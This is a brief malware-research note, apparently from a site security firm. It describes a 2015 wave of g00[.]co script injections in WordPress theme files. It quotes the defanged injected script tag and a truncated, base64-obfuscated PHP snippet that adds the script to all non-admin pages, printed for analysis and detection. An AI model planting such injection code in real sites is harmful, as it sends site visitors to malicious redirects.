New Wave of g00 Script Injections

  • November 16, 2015
Labs Note

Once active during the past summer, the g00[.]co script injections come with a new wave on infections this November.

The most common variation is

<script src="hxxp: / / g00[.]co/BtFVPd"></script>

This short URL hides the hxxp://yourjavascript[.]com/3921156982/not.js script, which in turn opens hxxp://speedclick[.]info/app/amung.php?c=a&s= for visitors that come from Facebook, Google, Bing and Yahoo!

On the server side, the malware is mainly injected into WordPress theme files. Usually you can find the following PHP code (in one line. Line breaks added for readability) in either footer.php or functions.php:

if (strpos($_SERVER[base64_decode("UkVRVUVTVF9VUkk=")],
base64_decode("d3AtYWRtaW4=")) === false) 
{
echo base64_decode(base64_decode(base64_decode("VUVoT2Ft...skipped...edUFEwSw0K")));
}

It injects that g00 script into all site URLs that don’t contain wp-admin.

As always, if you need site security monitoring and cleanup services, you can count on us.

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Related Tags
Related Categories
You May Also Like